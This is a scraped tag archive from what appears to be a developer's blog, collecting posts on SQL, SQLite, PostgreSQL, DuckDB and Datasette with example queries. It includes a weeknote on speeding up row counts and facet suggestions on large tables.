Thomas posted this comment on Hacker News:

Permit me a PSA about local politics: engaging in national politics is bleak and dispiriting, like being a gnat bouncing off the glass plate window of a skyscraper. Local politics is, by contrast, extremely responsive. I've gotten things done --- including a law passed --- in my spare time and at practically no expense (drastically unlike national politics).

Via Hacker News

Tags: data-journalism, databases, government, law, politics, sql, sql-injection, thomas-ptacek

Dashboard: Tools

2024-10-21T03:33:41+00:00

Dashboard: Tools

I used Django SQL Dashboard to spin up a dashboard that shows all of the URLs to my tools.simonwillison.net site that I've shared on my blog so far. It uses this (Claude assisted) regular expression in a PostgreSQL SQL query:

select distinct on (tool_url)
    unnest(regexp_matches(
        body,
        '(https://tools\.simonwillison\.net/[^<"\s)]+)',
        'g'
    )) as tool_url,
    'https://simonwillison.net/' || left(type, 1) || '/' || id as blog_url,
    title,
    date(created) as created
from content

I've been really enjoying having a static hosting platform (it's GitHub Pages serving my simonw/tools repo) that I can use to quickly deploy little HTML+JavaScript interactive tools and demos.

Tags: javascript, postgresql, projects, sql, tools, django-sql-dashboard, ai-assisted-programming

PostgreSQL 17: SQL/JSON is here!

2024-10-13T19:01:02+00:00

PostgreSQL 17: SQL/JSON is here!

Hubert Lubaczewski dives into the new JSON features added in PostgreSQL 17, released a few weeks ago on the 26th of September. This is the latest in his long series of similar posts about new PostgreSQL features.

The features are based on the new SQL:2023 standard from June 2023. If you want to actually read the specification for SQL:2023 it looks like you have to buy a PDF from ISO for 194 Swiss Francs (currently $226). Here's a handy summary by Peter Eisentraut: SQL:2023 is finished: Here is what's new.

There's a lot of neat stuff in here. I'm particularly interested in the json_table() table-valued function, which can convert a JSON string into a table with quite a lot of flexibility. You can even specify a full table schema as part of the function call:

SELECT * FROM json_table(
    '[{"a":10,"b":20},{"a":30,"b":40}]'::jsonb,
    '$[*]'
    COLUMNS (
        id FOR ORDINALITY,
        column_a int4 path '$.a',
        column_b int4 path '$.b',
        a int4,
        b int4,
        c text
    )
);

SQLite has solid JSON support already and often imitates PostgreSQL features, so I wonder if we'll see an update to SQLite that reflects some aspects of this new syntax.

Via lobste.rs

Tags: json, postgresql, sql, sqlite

Hybrid full-text search and vector search with SQLite

2024-10-04T16:22:09+00:00

Hybrid full-text search and vector search with SQLite

As part of Alex’s work on his sqlite-vec SQLite extension - adding fast vector lookups to SQLite - he’s been investigating hybrid search, where search results from both vector similarity and traditional full-text search are combined together.

The most promising approach looks to be Reciprocal Rank Fusion, which combines the top ranked items from both approaches. Here’s Alex’s SQL query:

-- the sqlite-vec KNN vector search results
with vec_matches as (
  select
    article_id,
    row_number() over (order by distance) as rank_number,
    distance
  from vec_articles
  where
    headline_embedding match lembed(:query)
    and k = :k
),
-- the FTS5 search results
fts_matches as (
  select
    rowid,
    row_number() over (order by rank) as rank_number,
    rank as score
  from fts_articles
  where headline match :query
  limit :k
),
-- combine FTS5 + vector search results with RRF
final as (
  select
    articles.id,
    articles.headline,
    vec_matches.rank_number as vec_rank,
    fts_matches.rank_number as fts_rank,
    -- RRF algorithm
    (
      coalesce(1.0 / (:rrf_k + fts_matches.rank_number), 0.0) * :weight_fts +
      coalesce(1.0 / (:rrf_k + vec_matches.rank_number), 0.0) * :weight_vec
    ) as combined_rank,
    vec_matches.distance as vec_distance,
    fts_matches.score as fts_score
  from fts_matches
  full outer join vec_matches on vec_matches.article_id = fts_matches.rowid
  join articles on articles.rowid = coalesce(fts_matches.rowid, vec_matches.article_id)
  order by combined_rank desc
)
select * from final;

I’ve been puzzled in the past over how to best do that because the distance scores from vector similarity and the relevance scores from FTS are meaningless in comparison to each other. RRF doesn’t even attempt to compare them - it uses them purely for row_number() ranking within each set and combines the results based on that.

Tags: full-text-search, search, sql, sqlite, alex-garcia, vector-search, embeddings, rag

Quoting D. Richard Hipp

2024-08-28T22:30:28+00:00

My goal is to keep SQLite relevant and viable through the year 2050. That's a long time from now. If I knew that standard SQL was not going to change any between now and then, I'd go ahead and make non-standard extensions that allowed for FROM-clause-first queries, as that seems like a useful extension. The problem is that standard SQL will not remain static. Probably some future version of "standard SQL" will support some kind of FROM-clause-first query format. I need to ensure that whatever SQLite supports will be compatible with the standard, whenever it drops. And the only way to do that is to support nothing until after the standard appears.

When will that happen? A month? A year? Ten years? Who knows.

I'll probably take my cue from PostgreSQL. If PostgreSQL adds support for FROM-clause-first queries, then I'll do the same with SQLite, copying the PostgreSQL syntax. Until then, I'm afraid you are stuck with only traditional SELECT-first queries in SQLite.

— D. Richard Hipp

Tags: d-richard-hipp, sql, postgresql, sqlite

SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL

2024-08-24T23:00:01+00:00

SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL

A new paper from Google Research describing custom syntax for analytical SQL queries that has been rolling out inside Google since February, reaching 1,600 "seven-day-active users" by August 2024.

A key idea is here is to fix one of the biggest usability problems with standard SQL: the order of the clauses in a query. Starting with SELECT instead of FROM has always been confusing, see SQL queries don't start with SELECT by Julia Evans.

Here's an example of the new alternative syntax, taken from the Pipe query syntax documentation that was added to Google's open source ZetaSQL project last week.

For this SQL query:

SELECT component_id, COUNT(*)
FROM ticketing_system_table
WHERE
  assignee_user.email = 'username@email.com'
  AND status IN ('NEW', 'ASSIGNED', 'ACCEPTED')
GROUP BY component_id
ORDER BY component_id DESC;

The Pipe query alternative would look like this:

FROM ticketing_system_table
|> WHERE
    assignee_user.email = 'username@email.com'
    AND status IN ('NEW', 'ASSIGNED', 'ACCEPTED')
|> AGGREGATE COUNT(*)
   GROUP AND ORDER BY component_id DESC;

The Google Research paper is released as a two-column PDF. I snarked about this on Hacker News:

Google: you are a web company. Please learn to publish your research papers as web pages.

This remains a long-standing pet peeve of mine. PDFs like this are horrible to read on mobile phones, hard to copy-and-paste from, have poor accessibility (see this Mastodon conversation) and are generally just bad citizens of the web.

Having complained about this I felt compelled to see if I could address it myself. Google's own Gemini Pro 1.5 model can process PDFs, so I uploaded the PDF to Google AI Studio and prompted the gemini-1.5-pro-exp-0801 model like this:

Convert this document to neatly styled semantic HTML

This worked surprisingly well. It output HTML for about half the document and then stopped, presumably hitting the output length limit, but a follow-up prompt of "and the rest" caused it to continue from where it stopped and run until the end.

Here's the result (with a banner I added at the top explaining that it's a conversion): Pipe-Syntax-In-SQL.html

I haven't compared the two completely, so I can't guarantee there are no omissions or mistakes.

The figures from the PDF aren't present - Gemini Pro output tags like <img src="figure1.png" alt="Figure 1: SQL syntactic clause order doesn't match semantic evaluation order. (From [25].)"> but did nothing to help me create those images.

Amusingly the document ends with <p>(A long list of references, which I won't reproduce here to save space.)</p> rather than actually including the references from the paper!

So this isn't a perfect solution, but considering it took just the first prompt I could think of it's a very promising start. I expect someone willing to spend more than the couple of minutes I invested in this could produce a very useful HTML alternative version of the paper with the assistance of Gemini Pro.

One last amusing note: I posted a link to this to Hacker News a few hours ago. Just now when I searched Google for the exact title of the paper my HTML version was already the third result!

I've now added a <meta name="robots" content="noindex, follow"> tag to the top of the HTML to keep this unverified AI slop out of their search index. This is a good reminder of how much better HTML is than PDF for sharing information on the web!

Via Hacker News

Tags: google, pdf, seo, sql, ai, julia-evans, generative-ai, llms, gemini, slop

Optimizing Datasette (and other weeknotes)

2024-08-22T15:46:43+00:00

I've been working with Alex Garcia on an experiment involving using Datasette to explore FEC contributions. We currently have a 11GB SQLite database - trivial for SQLite to handle, but at the upper end of what I've comfortably explored with Datasette in the past.

This was just the excuse I needed to dig into some optimizations! The next Datasette alpha release will feature some significant speed improvements for working with large tables - they're available on the main branch already.

Datasette tracing

Datasette has had a ?_trace=1 feature for a while. It's only available if you run Datasette with the trace_debug setting enabled - which you can do like this:

datasette -s trace_debug 1 mydatabase.db

Then any request with ?_trace=1 added to the URL will return a JSON blob at the end of the page showing every SQL query that was executed, how long it took and a truncated stack trace showing the code that triggered it.

Scroll to the bottom of https://latest.datasette.io/fixtures?_trace=1 for an example.

The JSON isn't very pretty. datasette-pretty-traces is a plugin I built to fix that - it turns that JSON into a much nicer visual representation.

As I dug into tracing I found a nasty bug in the trace mechanism. It was meant to quietly give up on pages longer than 256KB, in order to avoid having to spool potentially megabytes of data into memory rather than streaming it to the client. That code had a bug: the user would get a blank page instead! I fixed that first.

The next problem was that SQL queries that terminated with an error - including the crucial "query interrupted" error raised when a query took longer than the Datasette configured time limit - were not being included in the trace. That's fixed too, and I upgraded datasette-pretty-traces to render those errors with a pink background:

This gave me all the information I needed to track down those other performance problems.

Rule of thumb: don't scan more than 10,000 rows

SQLite is fast, but you can still run into performance problems if you ask it to scan too many rows.

Going forward, I'm introducing a new target for Datasette development: never scan more than 10,000 rows without a user explicitly requesting that scan.

The most common time this happens is with a select count(*) query. Datasette likes to display the number of rows in a table, and when you run a SQL query it likes to show you how many total rows match even when only displaying a subset of them in the paginated interface.

These counts are shown in two key places: on the list of tables in a database, and on the table view itself.

Counts are protected by Datasette's query time limit mechanism. On the table listing page this was configured such that if a count takes longer than 5ms it would be skipped and "Many rows" would be displayed. It turns out this mechanism isn't as reliable as I had hoped, maybe due to the overhead of cancelling the query. Given enough large tables those cancelled count queries could still add up to user-visible latency problems on that page.

Here's the pattern I turned to that fixed the performance problem:

select count(*) from (
    select * from libfec_SA16 limit 10001
)

This nested query first limits the table to 10,001 rows, then counts them. If the count is less than 10,001 we know that the count is entirely accurate. If it's exactly 10,001 we can show ">10,000 rows" in the UI.

Capping the number of scanned rows to 10,000 for any of these counts makes a huge difference in the performance of these pages!

But what about those table pages? Showing ">10,000 rows" is a bit of a cop-out, especially if the question the user wants to answer is "how many rows are in this table / match this filter?"

I addressed that in issue #2408: Datasette still truncates the count at 10,000 on initial page load, but users now get a "count all" link they can click to execute the full count.

The link goes to a SQL query page that runs the query, but I've also added a bit of progressive enhancement JavaScript to run that query and update the page in-place when the link is clicked. Here's what that looks like:

10,000 rows with a count all link. Clicking that replaces it with the text counting... which then replaces the entire count text with 23,036,621 rows." style="max-width: 100%;" />

In the future I may add various caching mechanisms so that counts that have been calculated can be displayed elsewhere in the UI without having to re-run the expensive queries. I may also incorporate SQL triggers for updating exact denormalized counts in a _counts table, as implemented in sqlite-utils.

The other feature that was really hurting performance was facet suggestions.

Datasette Facets are a really powerful way to quickly explore data. They can be applied to any column by the user, but to make the feature more visible Datasette suggests facets that might be a good fit for the current table by looking for things like columns that only contain 3 unique values.

The suggestion code was designed with performance in mind - it uses tight time limits (governed by the facet_suggest_time_limit_ms setting, defaulting to 50ms) and attempts to use other SQL tricks to quickly decide if a facet should be considered or not.

I found a couple of tricks to dramatically speed these up against larger tables as well.

First, I've started enforcing that new 10,000 limit for facet suggestions too - so each suggestion query only considers a maximum of 10,000 rows, even on tables with millions of items. These suggestions are just suggestions, so seeing a recommendation that would not have been suggested if the full table had been scanned is a reasonable trade-off.

Secondly, I spotted a gnarly bug in the way the date facet suggestion works. The previous query looked like this:

select date(column_to_test) from ( 
    select * from mytable
)
where column_to_test glob "????-??-*"
limit 100;

That limit 100 was meant to restrict it to considering 100 rows... but that didn't actually work! If a table with 20 million columns in had NO rows that matched the glob pattern, the query would still scan all 20 million rows.

The new query looks like this, and fixes the problem:

select date(column_to_test) from ( 
    select * from mytable limit 100
)
where column_to_test glob "????-??-*"

Moving the limit to the inner query causes the SQL to only run against the first 100 rows, as intended.

Thanks to these optimizations running Datasette against a database with huge tables now feels snappy and responsive. Expect them in an alpha release soon.

On the blog

I'm trying something new for the rest of my weeknotes. Since I'm investing a lot more effort in my link blog, I'm including a digest of everything I've linked to since the last edition. I updated my weeknotes Observable notebook to help generate these, after prompting Claude to help prototype a bunch of different approaches.

The following section was generated by this code - it includes everything I've posted, grouped by the most "interesting" tag assigned to each post. I'll likely iterate on this a bunch more in the future.

openai

OpenAI: Introducing Structured Outputs in the API - 2024-08-06
GPT-4o System Card - 2024-08-08
Using sqlite-vec with embeddings in sqlite-utils and Datasette - 2024-08-11

javascript

Observable Plot: Waffle mark - 2024-08-06
Reckoning - 2024-08-18

python

cibuildwheel 2.20.0 now builds Python 3.13 wheels by default - 2024-08-06
django-http-debug, a new Django app mostly written by Claude - 2024-08-08
PEP 750 – Tag Strings For Writing Domain-Specific Languages - 2024-08-11
mlx-whisper - 2024-08-13
Upgrading my cookiecutter templates to use python -m pytest - 2024-08-17
Writing your pyproject.toml - 2024-08-20
uv: Unified Python packaging - 2024-08-20
#!/usr/bin/env -S uv run - 2024-08-21
Armin Ronacher: There is an elephant in the room which is that As... - 2024-08-21
light-the-torch - 2024-08-22

security

Google AI Studio data exfiltration demo - 2024-08-07
SQL Injection Isn't Dead: Smuggling Queries at the Protocol Level - 2024-08-12
Links and materials for Living off Microsoft Copilot - 2024-08-14
Adam Newbold: [Passkeys are] something truly unique, because ba... - 2024-08-15
com2kid: Having worked at Microsoft for almost a decade, I... - 2024-08-16
Data Exfiltration from Slack AI via indirect prompt injection - 2024-08-20
SQL injection-like attack on LLMs with special tokens - 2024-08-20
The dangers of AI agents unfurling hyperlinks and what to do about it - 2024-08-21

llm

q What do I title this article? - 2024-08-07

prompt-engineering

Braggoscope Prompts - 2024-08-07
Using gpt-4o-mini as a reranker - 2024-08-11
LLMs are bad at returning code in JSON - 2024-08-16

andrej-karpathy

Andrej Karpathy: The RM [Reward Model] we train for LLMs is just a... - 2024-08-08

projects

Share Claude conversations by converting their JSON to Markdown - 2024-08-08
Datasette 1.0a15 - 2024-08-16
datasette-checkbox - 2024-08-16
Fix @covidsewage bot to handle a change to the underlying website - 2024-08-18

anthropic

Gemini 1.5 Flash price drop - 2024-08-08
Prompt caching with Claude - 2024-08-14
Alex Albert: Examples are the #1 thing I recommend people use ... - 2024-08-15
Introducing Zed AI - 2024-08-20

sqlite

High-precision date/time in SQLite - 2024-08-09
New Django {% querystring %} template tag - 2024-08-13

ethics

Where Facebook's AI Slop Comes From - 2024-08-10

jon-udell

Jon Udell: Some argue that by aggregating knowledge drawn fr... - 2024-08-10

browsers

Ladybird set to adopt Swift - 2024-08-11

explorables

Transformer Explainer - 2024-08-11

ai-assisted-programming

Tom MacWright: But [LLM assisted programming] does make me wonde... - 2024-08-12

hacker-news

dang: We had to exclude [dead] and eventually even just... - 2024-08-12

design

Help wanted: AI designers - 2024-08-13

prompt-injection

A simple prompt injection template - 2024-08-14

fly

Fly: We're Cutting L40S Prices In Half - 2024-08-16

open-source

Whither CockroachDB? - 2024-08-16

game-design

“The Door Problem” - 2024-08-18

whisper

llamafile v0.8.13 (and whisperfile) - 2024-08-19

Migrating Mess With DNS to use PowerDNS - 2024-08-19

Releases

datasette-pretty-traces 0.5 - 2024-08-21
Prettier formatting for ?_trace=1 traces
sqlite-utils-ask 0.1a0 - 2024-08-19
Ask questions of your data with LLM assistance
datasette-checkbox 0.1a2 - 2024-08-16
Add interactive checkboxes to columns in Datasette
datasette 1.0a15 - 2024-08-16
An open source multi-tool for exploring and publishing data
asgi-csrf 0.10 - 2024-08-15
ASGI middleware for protecting against CSRF attacks
datasette-pins 0.1a3 - 2024-08-07
Pin databases, tables, and other items to the Datasette homepage
django-http-debug 0.2 - 2024-08-07
Django app for creating endpoints that log incoming request and return mock data

TILs

Using sqlite-vec with embeddings in sqlite-utils and Datasette - 2024-08-11
Using pytest-django with a reusable Django application - 2024-08-07

Tags: performance, sql, sqlite, datasette, weeknotes

How to Get or Create in PostgreSQL

2024-08-05T15:15:30+00:00

How to Get or Create in PostgreSQL

Get or create - for example to retrieve an existing tag record from a database table if it already exists or insert it if it doesn’t - is a surprisingly difficult operation.

Haki Benita uses it to illustrate a variety of interesting PostgreSQL concepts.

New to me: a pattern that runs INSERT INTO tags (name) VALUES (tag_name) RETURNING *; and then catches the constraint violation and returns a record instead has a disadvantage at scale: “The table contains a dead tuple for every attempt to insert a tag that already existed” - so until vacuum runs you can end up with significant table bloat!

Haki’s conclusion is that the best solution relies on an upcoming feature coming in PostgreSQL 17: the ability to combine the MERGE operation with a RETURNING clause:

WITH new_tags AS (
    MERGE INTO tags
    USING (VALUES ('B'), ('C')) AS t(name)
    ON tags.name = t.name
WHEN NOT MATCHED THEN
    INSERT (name) VALUES (t.name)
    RETURNING *
)
SELECT * FROM tags WHERE name IN ('B', 'C')
    UNION ALL
SELECT * FROM new_tags;

I wonder what the best pattern for this in SQLite is. Could it be as simple as this?

INSERT OR IGNORE INTO tags (name) VALUES ('B'), ('C');

The SQLite INSERT documentation doesn't currently provide extensive details for INSERT OR IGNORE, but there are some hints in this forum thread. This post by Rob Hoelz points out that INSERT OR IGNORE will silently ignore any constraint violation, so INSERT INTO tags (tag) VALUES ('C'), ('D') ON CONFLICT(tag) DO NOTHING may be a better option.

Via Hacker News

Tags: postgresql, sql, sqlite, haki-benita

Build your own SQS or Kafka with Postgres

2024-07-31T17:34:54+00:00

Build your own SQS or Kafka with Postgres

Anthony Accomazzo works on Sequin, an open source "message stream" (similar to Kafka) written in Elixir and Go on top of PostgreSQL.

This detailed article describes how you can implement message queue patterns on PostgreSQL from scratch, including this neat example using a CTE, returning and for update skip locked to retrieve $1 messages from the messages table and simultaneously mark them with not_visible_until set to $2 in order to "lock" them for processing by a client:

with available_messages as (
  select seq
  from messages
  where not_visible_until is null
    or (not_visible_until <= now())
  order by inserted_at
  limit $1
  for update skip locked
)
update messages m
set
  not_visible_until = $2,
  deliver_count = deliver_count + 1,
  last_delivered_at = now(),
  updated_at = now()
from available_messages am
where m.seq = am.seq
returning m.seq, m.data;

Via lobste.rs

Tags: message-queues, postgresql, sql, sqs, kafka

DuckDB 1.0

2024-06-03T13:23:50+00:00

DuckDB 1.0

Six years in the making. The most significant feature in this milestone is stability of the file format: previous releases often required files to be upgraded to work with the new version.

This release also aspires to provide stability for both the SQL dialect and the C API, though these may still change with sufficient warning in the future.

Via @duckdb

Tags: databases, sql, duckdb

Why SQLite Uses Bytecode

2024-04-30T05:32:54+00:00

Why SQLite Uses Bytecode

Brand new SQLite architecture documentation by D. Richard Hipp explaining the trade-offs between a bytecode based query plan and a tree of objects.

SQLite uses the bytecode approach, which provides an important characteristic that SQLite can very easily execute queries incrementally—stopping after each row, for example. This is more useful for a local library database than for a network server where the assumption is that the entire query will be executed before results are returned over the wire.

Via @DRichardHipp

Tags: databases, sql, sqlite, d-richard-hipp

Optimizing SQLite for servers

2024-03-31T20:16:23+00:00

Optimizing SQLite for servers

Sylvain Kerkour's comprehensive set of lessons learned running SQLite for server-based applications.

There's a lot of useful stuff in here, including detailed coverage of the different recommended PRAGMA settings.

There was also a tip I haven't seen before about BEGIN IMMEDIATE transactions:

By default, SQLite starts transactions in DEFERRED mode: they are considered read only. They are upgraded to a write transaction that requires a database lock in-flight, when query containing a write/update/delete statement is issued.

The problem is that by upgrading a transaction after it has started, SQLite will immediately return a SQLITE_BUSY error without respecting the busy_timeout previously mentioned, if the database is already locked by another connection.

This is why you should start your transactions with BEGIN IMMEDIATE instead of only BEGIN. If the database is locked when the transaction starts, SQLite will respect busy_timeout.

Via lobste.rs

Tags: databases, performance, sql, sqlite, sqlite-busy

Quoting Seth Rosen

2024-03-25T23:33:26+00:00

Them: Can you just quickly pull this data for me?

Me: Sure, let me just:

SELECT * FROM some_ideal_clean_and_pristine.table_that_you_think_exists

— Seth Rosen

Tags: sql, analytics

DuckDB as the New jq

2024-03-21T20:36:20+00:00

DuckDB as the New jq

The DuckDB CLI tool can query JSON files directly, making it a surprisingly effective replacement for jq. Paul Gross demonstrates the following query:

select license->>'key' as license, count(*) from 'repos.json' group by 1

repos.json contains an array of {"license": {"key": "apache-2.0"}..} objects. This example query shows counts for each of those licenses.

Via lobste.rs

Tags: cli, sql, jq, duckdb

Simon Willison's Weblog: sql

SQLite 3.53.0

Syntaqlite Playground

Production query plans without production data

The most popular blogs of Hacker News in 2025

Inside PostHog: How SSRF, a ClickHouse SQL Escaping 0day, and Default PostgreSQL Credentials Formed an RCE Chain

How I automate my Substack newsletter with content from my blog

The Observable notebook

From Django+Postgresql to Datasette+SQLite

A new SQL-powered permissions system in Datasette 1.0a20

Understanding the permissions system

Permissions systems need to be able to efficiently list things

The new permission_resources_sql() plugin hook

Hierarchies, plugins, vetoes, and restrictions

New debugging tools

The missing feature: list actors who can act on this resource

Upgrading plugins for Datasette 1.0a20

Using Claude Code to implement this change

Starting with a proof-of-concept

Miscellaneous tips I picked up along the way

What's next?

Quoting IanCal

Spatial Joins in DuckDB

TIL: SQLite triggers

SQLite CREATE TABLE: The DEFAULT clause

DuckDB is Probably the Most Important Geospatial Software of the Last Decade

New dashboard: alt text for all my images

ClickHouse gets lazier (and faster): Introducing lazy materialization

Abusing DuckDB-WASM by making SQL draw 3D graphics (Sort Of)

[NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE]

I Went To SQL Injection Court

Dashboard: Tools

PostgreSQL 17: SQL/JSON is here!

Hybrid full-text search and vector search with SQLite

Quoting D. Richard Hipp

SQL Has Problems. We Can Fix Them: Pipe Syntax In SQL

Optimizing Datasette (and other weeknotes)

Datasette tracing

Rule of thumb: don't scan more than 10,000 rows

Optimized facet suggestions

On the blog

Releases

TILs

How to Get or Create in PostgreSQL

Build your own SQS or Kafka with Postgres

DuckDB 1.0

Why SQLite Uses Bytecode

Optimizing SQLite for servers

Quoting Seth Rosen

DuckDB as the New jq